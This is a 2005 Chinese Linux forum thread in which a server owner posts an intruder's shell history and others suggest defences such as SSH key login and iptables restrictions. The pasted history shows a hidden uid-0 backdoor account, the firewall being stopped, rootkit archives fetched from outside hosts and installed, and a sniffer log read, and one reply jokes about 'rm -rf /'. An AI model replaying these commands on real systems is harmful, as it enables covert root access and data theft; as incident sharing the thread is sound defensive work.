免费注册	查看新帖 \|


平台论坛博客文库

› 论坛 › IT运维 › 数据安全 › 今天服务器被黑客给黑了！

12 3 4 5 6 / 6 页下一页

最近访问板块

发新帖

查看: 19072 | 回复: 55

上一主题

下一主题

今天服务器被黑客给黑了！ [复制链接]

论坛徽章:: 0

电梯直达

跳转到指定楼层

1楼 [收藏(0)] [报告]

发表于 2005-09-23 13:44 |只看该作者 |倒序浏览

这是他到机器上运行的命令：
455  useradd -g0 -u0 -o -d /dev/.null bulake
  456  /usr/sbin/useradd -g0 -u0 -o -d /dev/.null bulake
  457  passwd bulake
  458  cd /etc/init.d
  459  ls
  460  ./iptables
  461  ./iptables stop
  462  wget www.lamersteam.co.uk/hackz/sk.tgz
  463  tar zxvf sk.tgz
  464  rm -rf sk.tgz
  465  ./inst
  466  ps x
  467  ls
  468  cd /var/spool./cron/.sk
  469  ls
  470  ls -sa
  471  cat .sniffer
  472  wget www.hostcenter.us/linuxkit.tar
  473  tar xvf linuxkit.tar
  474  rm -rf linuxkit.tar
  475  cd shv5/
  476  ./setup 211020 1
  477  elnet localhost 22
  478  telnet localhost 1
  479  cd ..
  480  ls -sa
  481  .sniffer
  482  cat .sniffer
  483  cat .sniffer
  484  cat .sniffer
  485  rm -rf .sniffer
  486  exit
  487  su
  488  exit
  489  ls
  490  cd asb
  491  ./a
  492  ./scan
  493  ls
  494  w
  495  cd /var/spool./cron/.sk
  496  ls -sa
  497  cat .sniffer
  498  exit
  499  su
  500  exit

把我的root密码都改了。这个服务器是个应用服务器。我都不晓得我的这个地址是被他怎么知道的。

文库|博客

liu.freedom.zhe

论坛徽章:: 0

2楼 [报告]

发表于 2005-09-23 14:00 |只看该作者

今天服务器被黑客给黑了！

他的目的好像是练习或者找有价值的信息，对你造成的损失不大。连history的记录都不知道清除，水平也不是很高，看看其他的log有没有更多的有用的信息（用什么方法进入的）。
注意补防漏洞，封他IP。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

3楼 [报告]

发表于 2005-09-23 14:03 |只看该作者

今天服务器被黑客给黑了！

兄弟服务器上跑的是什么服务？
最好查出是如何侵入的。好做好防备。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

4楼 [报告]

发表于 2005-09-23 14:15 |只看该作者

今天服务器被黑客给黑了！

我只开ssh..不开telnet..
而且限定ssh登陆的时间,ip地址..

近期准备再看看iptables...
不知道还有啥安全可以设置..

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

5楼 [报告]

发表于 2005-09-23 14:17 |只看该作者

今天服务器被黑客给黑了！

原帖由 "lijietz" 发表：
我只开ssh..不开telnet..
而且限定ssh登陆的时间,ip地址..

近期准备再看看iptables...
不知道还有啥安全可以设置..

如果兄弟只开启SSH的话，可是使用ssh的key验证。不要使用passwd的验证方式。这样没有key的就不会出现输入passwd的对话框。也就不能猜测passwd了。
另外再接合iptables控制运行联接的IP地址就好了。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

6楼 [报告]

发表于 2005-09-23 14:30 |只看该作者

今天服务器被黑客给黑了！

原帖由 "hongfengyue" 发表：

如果兄弟只开启SSH的话，可是使用ssh的key验证。不要使用passwd的验证方式。这样没有key的就不会出现输入passwd的对话框。也就不能猜测passwd了。
另外再接合iptables控制运行联接的IP地址就好了。

谢谢.

是oracle ERP系统,对安全要求很高....没专门的linux sa..
而我的linux水平又很一般...

诶..有点怕怕啊..

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

7楼 [报告]

发表于 2005-09-23 14:41 |只看该作者

今天服务器被黑客给黑了！

原帖由 "lijietz" 发表：

谢谢.

是oracle ERP系统,对安全要求很高....没专门的linux sa..
而我的linux水平又很一般...

诶..有点怕怕啊..

你们要求高，而又没有专职的SA。有点怪怪的，象在打赌一样。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

8楼 [报告]

发表于 2005-09-23 14:43 |只看该作者

今天服务器被黑客给黑了！

我上面就跑了一个jboss服务器。还有一个oracle数据库服务器。我们服务器是放到DMZ区的。外网防火墙用的是天容行的防火墙。它是怎么进来的啊。不晓得。不过怕下次进来又搞破坏。不晓得怎么搞。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 0

9楼 [报告]

发表于 2005-09-23 14:49 |只看该作者

今天服务器被黑客给黑了！

[quote]原帖由 "qsxing"]我上面就跑了一个jboss服务器。还有一个oracle数据库服务器。我们服务器是放到DMZ区的。外网防火墙用的是天容行的防火墙。它是怎么进来的啊。不晓得。不过怕下次进来又搞破坏。不晓得怎么搞。[/quote 发表：

给你来个 rm -rf / 咋办?

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

论坛徽章:: 5

巳蛇
日期:2013-08-28 09:26:15

CU十二周年纪念徽章
日期:2013-10-24 15:41:34

射手座
日期:2013-10-31 09:13:04

射手座
日期:2014-02-11 13:18:34

天秤座
日期:2014-03-25 09:22:28

10楼 [报告]

发表于 2005-09-23 14:50 |只看该作者

今天服务器被黑客给黑了！

DMZ啊．．．．还是应该配置一下安全的．

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

12 3 4 5 6 / 6 页下一页

发新帖

Chinaunix › 论坛 › IT运维 › 数据安全 › 今天服务器被黑客给黑了！

北京盛拓优讯信息技术有限公司. 版权所有京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号：11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员联系我们：huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP